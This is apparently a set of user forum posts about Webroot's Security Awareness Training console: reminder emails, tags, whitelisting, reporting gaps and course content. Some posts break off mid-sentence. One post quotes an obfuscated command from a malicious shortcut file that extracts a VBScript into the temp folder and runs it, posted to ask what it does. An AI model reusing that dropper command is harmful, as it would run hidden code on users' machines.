I may be missing something when creating target tags in Security Awareness Traiining. What I thought would happen is I could create a list of tags and apply them to targets (users) when needed. What I found was a bit clunky. I had to select an existing user, add a tag, and then apply the tag to that user. If I removed the tag from the user, the tag was no longer in the list of tags. For example, I tagged one user as newemp and another as csuite. Both tagswere in the tag list. When I removed the csuite tag from the user, it was no longer in the list.
One of the tools I provide for a number of my clients, is an anti-spam service, which blocks pretty much all of the Security Awareness emails out of hand. If I’m trying to help them learn how to avoid phishing emails, though, I’d really want them to be able to receive those emails, instead of them just going to the junk bin. When I tested out a different company’s version of this, the way we got around it was to load up a list of the domains used by the testing system, and whitelist them all, to make sure that the users actually got the messages. Is there a way to get such a list for this? Because otherwise, this isn’t going to be particularly valuable to my clients.
I haven't auto setup the reminder email while creating the training campaign whereas I found this ‘Send Reminder Now’ button under the launched Training campaign. Is there a way to find to whom the Reminder emails are sent when you click the ‘Send Reminder Now’ in the Reports.I would like to extract the list of targets who haven’t completed the training and the reminder emails need to be sent to them.
Dear Webroot Community Team,I hope this topic finds you well. I created a training campaign for a customer and selected the Reminders option to apply to those users who had not completed the required training module. Then, this campaign was launched. However, I had to cancel this campaign in order to update new information for customer. Although the campaign was cancelled (the link made inactive), its reminder option was not terminated.Hence, the incomplete targets will most likely experience an annoyance as the invitation email still being sent out. It was really painful experience. Could you please help me to clarify this issue and let me know what steps I should take to this issue?I would very much appreciate your support. Best wishes
I have mentioned this to our sales reps several times to pass on but after almost 2 years of using this product it still isn’t a thing so I’ll post here. My contract is up in August and if I see no plans for improvement then I’ll be moving to Knowbe4. -------Feedback------- When we run a campaign for a client we do it monthly. We’ll make our own phishing templates or use the built in ones. When the campaign is over I am required to provide a report to my client on the breakdown of what users did what. What I currently have to do is download the simulation stats PDF from the dashboard which provides the most basic readout of what occurred. I image clip the graph image and save it and place it in my own report. I then have to download the stats in .csv form which gives me the user breakdown. The .csv sheet is all the data I need for the customer but I am not going to send a client who is paying for this a .csv that is unreadable to a regular user. So I take what Webroot can give us
Afternoon all, just wondering if anyone in Australia or New Zealand has encountered issues around logo use etc when creating phishing emails. It seems that fair use etc may allow some use (according to a few US articles), but we don’t want to inadvertently damage anyone’s reputation if an email makes it to social media etc. All links going to an obvious education page etc should make things OK within target clients, but I am still concerned about any potential blow-back on us, our clients and the companies if we use a logo etc. without prior approval. I know the bad people don’t care as I’ve just seen a bank phishing attempt that was very well put together and a fake invoice email trail complete with payment request, but actively approaching a company and explaining what we are doing and asking for permission to use their intellectual property is (in my mind) impractical, especially when considering a multi-national with probably more important things on their mind. We will be appro

As the Content Development Specialist for WSAT, my goal is to provide you with valuable Safety Awareness content based on real-world threats. Is there a recommended config for setting up a G Suite domain for Security Awareness Training campaigns? As it is now, I have whitelisted the IP address found in the documentation, but this doesn’t prevent G Suite from marking the simulation email with a big RED BANNER warning the user. Would be nice not to have that happen for more effective training.
Hi all, I’ve gone through and created phishing campaigns, custom email templates and so forth with no issues against our internal site (targeting the others in the office). I have made global custom templates and set them to published, but when I try and use them against an actual customer (external) site, they do not appear in either site, system or global for selection. To be clear, they are not visible in the console when I select Settings > Email or if i go through the New Campaign process. I would have thought creating a template with global settings would allow me to pick up that template for use with any site. Am I incorrect in thinking this? Do I need to create custom templates for each client site? Is it possible that because we have our internal site set up as a separate entity from our clients (in Global Site Manager Consoles) that this is the cause? Any advice would be much appreciated. Thanks Franco
Is there a way to modify/edit an already created Training Campaign? What i'm after is removing users who already have taken the training on another campaign. Is this possible? Thank you, When setting the Auto-reminder to take training, users are still receiving reminders to complete their training even after completing the training. Is there a way to stop that from occurring? ^ Figured out.
It is really hard to tell in the interface which targets have taken the training courses and the only way I've found to identify them is to download a spreadsheet and then sort through all the information. The training report cards are inaccurate and the graphs give little information. Are there any plans to improve SAT reporting and dashboard information? Both could be significantly improved
Recently got an email from Chirotouch with a link to their website, that redirects to a different website and downloads a zip file. In the zip is a .ink file with the following info in the "Target" field. Any ideas on what this does? Webroot didn't pick it up, and Virus total says it's clean. %comspec% /c copy YPdhS & (fi^ndst^r "psHPn.*" Print.PDF.lnk > "%tmp%\bUQCg.vbs" & "%tmp%\bUQCg.vbs") & cDulb

Hi there, As an MSP with multiple sites for SAT we are finding a few features missing or lacking currently and wondered anyone is aware if these are planned for future or are already there and we are missing something:

The automatic email invites for the training can’t be customised at all currently – it would be better if they could, is that possible?
When we run training campaigns and people don’t complete the training there is no way to set the program up to automatically email the users that don’t complete the training. We have to go into each individual user to resend and remind them. Could this not be part of the campaign setup that you can select it to automatically email any users that don’t complete the training. Or even a check each user kind of option to resend to multiple users that haven’t completed instead of having to resend to each user individually?
Also if we have a program/campaign running for a company and they get a new starter, we can add them
The content from Teach Privacy is gone from Security Awareness Training. There is not enough security content left. Of the 28 modules 4 are how to use office, 4 are for UK compliance, 2 for Australia, there are 3 for phishing which are micro, mini, full of the same course. There is a data protection module for legislation which is out of date since GDPR came in. There are 5 courses I’m happy to push out to customers: GDPR, Understanding Cyber Security, Ransomware & Cybercrime, Understanding Phishing (full), Understanding Malware (which is an advert for Webroot, so maybe I'm not too happy with that one.) . We have our customers signed up to a subscription service based on security awareness training, we need more security related content. Is there more courseware to come? If so when?

How to access the Webroot Security Awareness Training management console Webroot’s Security Awareness Training console is available from the GSM Console > Sites page by clicking the icon under the SAT column that is next to the green checkbox, circled in red. If the green checkbox is not checked under the SAT column, Security Awareness Training has not been enabled for the site. Simply check the box to enable it, then the console icon will become available. If you cannot enable SAT for any site, check the status of the Security Awareness Training subscription under the GSM Console > Settings tab.
